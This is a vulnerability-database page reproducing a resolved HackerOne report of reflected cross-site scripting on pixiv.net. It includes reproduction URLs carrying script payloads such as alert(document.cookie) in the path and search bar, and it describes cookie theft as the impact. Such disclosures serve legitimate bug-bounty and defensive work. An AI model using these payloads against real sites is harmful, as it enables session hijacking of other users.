Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

XSS reflected on [https://www.pixiv.net]

Medium
P
pixiv
Submitted None
Actions:
View on HackerOne
Reported by bcobain23

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary: I found a xss reflected on https://www.pixiv.com URL and in the search bottom from Chrome IOS 13.1 ## Steps To Reproduce: 1. In the URL https://www.pixiv.net/en/%5B'-alert(document.cookie)-'%5D Add Payload ['-confirm(3)-'] 1. In the URL https://www.pixiv.net/en/%5B'-alert(document.cookie)-'%5D Add ['-alert(document.cookie)-'] 1. In the Search Bar Add ['-confirm(3)-'] and the URL is https://www.pixiv.net/en/tags/%5B'-confirm(3)-'%5D#discover ## Impact Steal Cookie

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$500.00

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected